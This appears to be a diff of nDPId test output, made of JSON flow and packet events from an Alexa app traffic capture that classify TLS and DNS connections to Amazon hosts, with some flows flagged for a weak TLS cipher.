+01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2628,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177411,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177411,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50796,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2631,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177116,"flow_last_seen":1490976177412,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177412,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50797,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2632,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1490976177416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976177416,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoZihAAEAGqh6sECrYNu8cssZvAbuB1uWpMeRpe1AQAVe46QAA"} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2637,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976177276,"flow_last_seen":1490976177419,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976177419,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2644,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976177276,"flow_last_seen":1490976177553,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976177553,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50799,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2670,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1490976178110,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976178110,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8lfxAAEAGejasECrYNu8cssZuAbts9RaEAAAAAKAC\/\/9M+QAAAgQFtAQCCAoA9oPjAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2672,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1490976178284,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976178284,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAww9ZAAOcGpWc27xyyrBAq2AG7xm5KXM+cbPUWhXASH\/7T5AAAAgQFtAEDAwY="} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2680,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1490976180796,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1490976180796,"pkt":"AQBeAAABAMDKkaPvCABGwAAgAABAAAECBBcAAAAA4AAAAZQEAAARZO6bAAAAAA=="} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":33,"flow_first_seen":1490976064452,"flow_last_seen":1490976068180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":17572,"flow_avg_l4_payload_len":532,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54434,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976064328,"flow_last_seen":1490976064897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5630,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42148,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186164,"flow_last_seen":1490976186164,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976186164,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1490976186164,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976186164,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hhtAAEAGihesECrYNu8cssZwAbtODwEcAAAAAKAC\/\/9+IQAAAgQFtAQCCAoA9ocHAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2682,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1490976186394,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976186394,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwCmJAAOcGXtw27xyyrBAq2AG7xnDcplSHTg8BHXASH\/7w+wAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2683,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1490976186398,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976186398,"pkt":"AMDKkaPvePiC0\/vCCABFAAAohhxAAEAGiiqsECrYNu8cssZwAbtODwEd3KZUiFAQAVc7bQAA"} -00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186164,"flow_last_seen":1490976186398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976186398,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186164,"flow_last_seen":1490976186551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976186551,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976054009,"flow_last_seen":1490976055604,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1146,"flow_tot_l4_payload_len":3565,"flow_avg_l4_payload_len":187,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976057977,"flow_last_seen":1490976058806,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4791,"flow_avg_l4_payload_len":239,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1490976058103,"flow_last_seen":1490976058813,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4709,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1490976180796,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186164,"flow_last_seen":1490976186164,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976186164,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2681,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1490976186164,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976186164,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hhtAAEAGihesECrYNu8cssZwAbtODwEcAAAAAKAC\/\/9+IQAAAgQFtAQCCAoA9ocHAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2682,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":2,"flow_last_seen":1490976186394,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976186394,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwCmJAAOcGXtw27xyyrBAq2AG7xnDcplSHTg8BHXASH\/7w+wAAAgQFtAEDAwY="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2683,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_packet_id":3,"flow_last_seen":1490976186398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976186398,"pkt":"AMDKkaPvePiC0\/vCCABFAAAohhxAAEAGiiqsECrYNu8cssZwAbtODwEd3KZUiFAQAVc7bQAA"} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186164,"flow_last_seen":1490976186398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":207,"flow_tot_l4_payload_len":207,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1490976186398,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01632{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976186164,"flow_last_seen":1490976186551,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976186551,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":50800,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186818,"flow_last_seen":1490976186818,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976186818,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1490976186818,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1490976186818,"pkt":"AMDKkaPvePiC0\/vCCABFAABVWmJAAEARMzysECrYrBAqASHdADUAQT24ItEBAAABAAAAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQAB"} 00805{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2698,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186818,"flow_last_seen":1490976186818,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976186818,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2701,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":1490976186879,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976186879,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl6vpAAEARopOsECoBrBAq2AA1Id0AUTsIItGBgAABAAEAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQABwAwAAQABAAAAIgAENu8XXg=="} 00819{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2701,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976186818,"flow_last_seen":1490976186879,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976186879,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":8669,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.23.94"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2702,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976186884,"flow_last_seen":1490976186884,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976186884,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2702,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1490976186884,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976186884,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8flZAAEAGlzCsECrYNu8XXq9wAbvy\/\/kGAAAAAKAC\/\/\/9UAAAAgQFtAQCCAoA9odQAAAAAAEDAwg="} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2703,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":1490976187052,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976187052,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwqiJAAOcGxG827xderBAq2AG7r3A+ML0a8v\/5B3ASH\/6mVwAAAgQFtAEDAwY="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2705,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_packet_id":3,"flow_last_seen":1490976187055,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976187055,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofldAAEAGl0OsECrYNu8XXq9wAbvy\/\/kHPjC9G1AQAVfwyAAA"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2706,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976186884,"flow_last_seen":1490976187057,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976187057,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 